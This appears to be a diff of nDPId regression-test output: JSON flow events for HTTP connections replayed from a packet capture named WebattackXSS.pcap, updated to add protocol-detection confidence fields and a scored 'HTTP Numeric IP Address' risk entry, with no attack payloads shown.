-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
